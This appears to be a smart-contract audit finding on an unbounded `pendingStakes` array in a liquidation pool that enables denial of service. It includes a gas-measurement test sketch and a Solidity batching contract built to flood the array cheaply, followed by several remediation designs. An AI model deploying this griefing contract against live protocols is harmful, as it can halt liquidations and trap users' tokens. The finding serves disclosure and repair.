`LiquidationPool::pendingStakes` is an unbounded array that can be populated to a size that causes a denial of the liquidation service.
Pending stakes are added to the `LiquidationPool` in `increasePosition()`. Every position increase is pushed into `pendingStakes`, with no restriction on stake size.
The entire `pendingStakes` array is iterated in `consolidatePendingStakes()`, where stakes older than one day are transitioned to full stakes. Whatever the size of `pendingStakes`, every element is read from storage, with additional storage writes for each transition to a full stake.
When a pending stake transitions, `LiquidationPool::deletePendingStake()` performs another iteration over `pendingStakes`.
`LiquidationPool::consolidatePendingStakes()` is called in `increasePosition()`, `decreasePosition()` and `distributeAssets()`, while `distributeFees()` loops over `pendingStakes` directly.
As the dynamic `pendingStakes` array is unbounded (the code never limits its length), it can grow to a size at which any calling function reverts, either by running out of gas or by exceeding the block gas limit. If `pendingStakes` grows to that problem size within one day, `LiquidationPool` becomes unusable, as every function using `pendingStakes` will revert.
`LiquidationPool::distributeFees()` is part of the call chain needed to liquidate under-collateralised vaults.
Gas usage result data has been generated using a JavaScript test case.
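The full test is not reproduced here; a sketch of the approach (deployment is elided behind a hypothetical project fixture, and all names are assumptions) is:

```javascript
// Sketch only: assumes a Hardhat project with the protocol's contracts and
// hardhat-gas-reporter installed; deployLiquidationPoolFixture is a
// hypothetical helper standing in for the project's deployment fixtures.
const { ethers } = require("hardhat");

describe("LiquidationPool pendingStakes gas growth", () => {
  const numberOfStakes = 500; // varied between runs

  it("grows gas usage of increasePosition with pendingStakes length", async () => {
    const [staker] = await ethers.getSigners();
    // deploy TST, EUROs and LiquidationPool; mint and approve tokens
    const pool = await deployLiquidationPoolFixture(staker);
    for (let i = 0; i < numberOfStakes; i++) {
      // minimal-value stakes: each call appends an entry to pendingStakes
      await pool.connect(staker).increasePosition(1, 1);
    }
    // hardhat-gas-reporter records min/max/avg gas per call across the run
  });
});
```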
In `hardhat.config.ts`:
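A minimal `hardhat-gas-reporter` fragment (assumed settings; the project's actual configuration may differ):

```typescript
// hardhat.config.ts (fragment, assumed): enable hardhat-gas-reporter so
// `hardhat test` emits per-function min/max/avg gas figures
const config = {
  gasReporter: {
    enabled: true,
    noColors: true,
    outputFile: "gas-report.txt",
  },
};

export default config;
```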
Run from the project root using:
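For example (the test filename is an assumption, not necessarily the project's actual name):

```shell
npx hardhat test test/liquidationPoolGas.test.js
```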
Altering the `numberOfStakes` value across runs of the test and extracting the `LiquidationPool` results provides the following summary:
As the `# calls` to `increasePosition` increases, the `Max` gas consumed in each test also increases (polynomially). The increase is due to looping over the unbounded array, with one clear extrapolation: given enough calls to `increasePosition`, the block gas limit will be reached.
After 3,484 calls to `LiquidationPool::increasePosition`, the array of pending stakes will be large enough to cause any function using `LiquidationPool::consolidatePendingStakes()` to exceed the Arbitrum One block gas limit (excluding any additional effect of `LiquidationPool::deletePendingStake()`).
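The threshold can be sanity-checked arithmetically; the ~9,185 gas per array element below is an assumption chosen for illustration, not a measured value from the test:

```javascript
// Back-of-the-envelope extrapolation (illustrative only: the per-element
// gas cost is an assumed figure, not a measurement).
const ARBITRUM_ONE_BLOCK_GAS_LIMIT = 32_000_000;
const ASSUMED_GAS_PER_PENDING_STAKE = 9_185; // storage reads/writes per element

// Array length at which a single consolidatePendingStakes() call no longer
// fits within one block:
const stakesToExceedBlock = Math.ceil(
  ARBITRUM_ONE_BLOCK_GAS_LIMIT / ASSUMED_GAS_PER_PENDING_STAKE
);
console.log(stakesToExceedBlock); // → 3484
```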
The denial of liquidation services prevents under-collateralised vaults from being liquidated, and in addition leaves all `TST` and `EUROs` held by the `LiquidationPool` contract trapped within it.
While it is plausible that organic traffic could produce 3.5K stakers increasing their positions, let us focus on a malicious actor.
A position can be increased with a single gwei of either `TST` or `EUROs`, plus gas. The gas cost can be reduced by deploying a batching contract that executes a configurable number of `increasePosition` calls in a loop within a single transaction, making the attack cheap and easy to execute while leaving no time for any preventative measures.
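A minimal sketch of such a batching contract (the contract name is an assumption; the pool interface follows the `increasePosition(uint256, uint256)` signature described above):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

interface ILiquidationPool {
    function increasePosition(uint256 _tstVal, uint256 _eurosVal) external;
}

interface IERC20 {
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

// Hypothetical attack sketch: floods pendingStakes with dust-sized entries.
contract PendingStakeGriefer {
    ILiquidationPool immutable pool;
    IERC20 immutable tst;

    constructor(address _pool, address _tst) {
        pool = ILiquidationPool(_pool);
        tst = IERC20(_tst);
    }

    // Pushes `count` minimal entries into pendingStakes in one transaction.
    function flood(uint256 count) external {
        tst.transferFrom(msg.sender, address(this), count);
        tst.approve(address(pool), count);
        for (uint256 i; i < count; ++i) {
            pool.increasePosition(1, 0); // 1 wei of TST, no EUROs
        }
    }
}
```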
Being unable to complete a call to `consolidatePendingStakes()` prevents reducing the size of `pendingStakes`, and with no other function available for the purpose, once the situation has occurred there is no escaping it.
Manual Review, Hardhat test, Hardhat gas reporter
There are a few options; which you prefer will depend on your appetite for redesign.
Considerations:
- Malicious actors
- Honest stakers
- O(n) gas scaling for increasing a pending stake
- O(n²) gas scaling for deleting a pending stake (as part of `consolidatePendingStakes()`)
The quickest option: require a non-trivial amount of value when increasing a stake.
Partial fix:
- Malicious actors: certain economic circumstances may still warrant the additional cost of an attack

Fails to fix:
- Honest stakers
- O(n) gas scaling for increasing a pending stake
- O(n²) gas scaling for deleting a pending stake (as part of `consolidatePendingStakes()`)
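A minimal sketch of that check (the constant name and threshold value are assumptions):

```solidity
// Sketch: reject dust-sized position increases (threshold value assumed)
uint256 public constant MIN_INCREASE = 1e18; // e.g. one whole token

function increasePosition(uint256 _tstVal, uint256 _eurosVal) external {
    require(_tstVal >= MIN_INCREASE || _eurosVal >= MIN_INCREASE, "stake too small");
    // ... existing consolidation and push logic ...
}
```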
Although a larger redesign could achieve sizable gas efficiencies, a minimal redesign reduces change risk.
Fixes:
- Malicious actors: liquidations can always go through

Partial fix:
- Honest stakers: increasing, decreasing and fee distribution could still be offline (requiring unsticking)

Fails to fix:
- O(n) gas scaling for increasing a pending stake
- O(n²) gas scaling for deleting a pending stake (as part of `consolidatePendingStakes()`)
The liquidation process must be decoupled from the promotion of pending stakes to full stakes. As liquidation is essential for maintaining the over-collateralisation of `EUROs`, no part of that flow should be exposed to unbounded loops. `increasePosition()`, `decreasePosition()` and `distributeFees()` can all still become stuck due to `pendingStakes`, but assuming these are non-critical to operations, add a function that processes a sub-set of `pendingStakes`. After one day, anyone could then call the function to reduce the size of `pendingStakes` by transitioning stakes that have passed their deadline.
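A sketch of such a bounded consolidation function, adapted from the existing consolidation loop (the parameter name and internal field names are assumptions):

```solidity
// Sketch: anyone may call this once stakes pass their one-day deadline,
// processing at most `_max` pending stakes per transaction so the call
// always fits within the block gas limit.
function consolidatePendingStakes(uint256 _max) external {
    uint256 deadline = block.timestamp - 1 days;
    uint256 processed;
    for (int256 i = 0; uint256(i) < pendingStakes.length && processed < _max; i++) {
        PendingStake memory _stake = pendingStakes[uint256(i)];
        if (_stake.createdAt < deadline) {
            positions[_stake.holder].TST += _stake.TST;
            positions[_stake.holder].EUROs += _stake.EUROs;
            deletePendingStake(uint256(i));
            i--; // the deletion shifts subsequent entries left
            processed++;
        }
    }
}
```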
Changes to both the process flow and underlying data structures, providing gas efficient scaling of the protocol.
Fixes:
- Malicious actors
- Honest stakers
- O(n) gas scaling for increasing a pending stake
- O(n²) gas scaling for deleting a pending stake (as part of `consolidatePendingStakes()`)
Although the full change set would be too extensive for this issue, the core ideas are:
- Change the liquidation flow
- Remove the `pendingStakes` array
- Add a FIFO queue of addresses
- Add a mapping of addresses to an array of `PendingStake`
- Re-implement the logic of the `pendingStakes`-dependent functions
The liquidation process must be decoupled from the promotion of pending stakes to full stakes. Similar to the previous option, rather than tagging the processing onto other calls, provide functions for that sole behaviour, again with sub-set processing to account for the potentially unbounded set size.
The contents of `pendingStakes` will be split into two parts: the FIFO queue and the address-to-`PendingStake` mapping. A First In, First Out (FIFO) queue (e.g. the OpenZeppelin `DoubleEndedQueue`) is suitable, as its storage use is optimized and all operations are O(1) constant time. The queue is ordered by time, with the oldest pending stakes as the earliest entries, which allows for early exits when looping.
A mapping of `address` to a dynamic array of `PendingStake` acts as the store for each user's pending stakes.
Replace the `pendingStakes` array with the new data structures.
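A sketch of the replacement storage (the queue and mapping names are assumptions; addresses are stored as `bytes32`, the deque's element type):

```solidity
import {DoubleEndedQueue} from "@openzeppelin/contracts/utils/structs/DoubleEndedQueue.sol";

contract LiquidationPool {
    using DoubleEndedQueue for DoubleEndedQueue.Bytes32Deque;

    struct PendingStake {
        address holder;
        uint256 createdAt;
        uint256 TST;
        uint256 EUROs;
    }

    // FIFO of stakers with outstanding pending stakes, oldest at the front
    DoubleEndedQueue.Bytes32Deque private pendingStakers;

    // Each holder's pending stakes
    mapping(address => PendingStake[]) private pendingStakesByHolder;
}
```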
An example of the changes needed in `LiquidationPool::increasePosition()` is to push the data onto the queue and mapping.
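A sketch of that push (replacing the array push; the by-holder mapping name is an assumption):

```solidity
// Record the staker in the time-ordered FIFO queue...
pendingStakers.pushBack(bytes32(uint256(uint160(msg.sender))));
// ...and the stake itself in the per-holder store
pendingStakesByHolder[msg.sender].push(
    PendingStake(msg.sender, block.timestamp, _tstVal, _eurosVal)
);
```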
Likewise, throughout the code, the calls to `consolidatePendingStakes()` need removing, replaced by `external` functions that allow consolidation by address (so keen users can update themselves) and consolidation of a limited number of users, as an unbounded staker count can now be supported (practically, there are storage limits).
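A sketch of those external entry points (`_consolidate` and `oldestPendingStakeTimestamp` are hypothetical helpers, and all names are assumptions):

```solidity
// Consolidate a single holder's matured pending stakes on demand.
function consolidatePendingStakes(address _holder) external {
    _consolidate(_holder);
}

// Consolidate up to `_maxHolders` holders from the front of the queue.
function consolidatePendingStakes(uint256 _maxHolders) external {
    uint256 deadline = block.timestamp - 1 days;
    for (uint256 i; i < _maxHolders && !pendingStakers.empty(); i++) {
        address holder = address(uint160(uint256(pendingStakers.front())));
        // Queue entries are time ordered, oldest first: once the front
        // entry is still within its one-day window, all later entries are too
        if (oldestPendingStakeTimestamp(holder) >= deadline) break;
        pendingStakers.popFront();
        _consolidate(holder);
    }
}
```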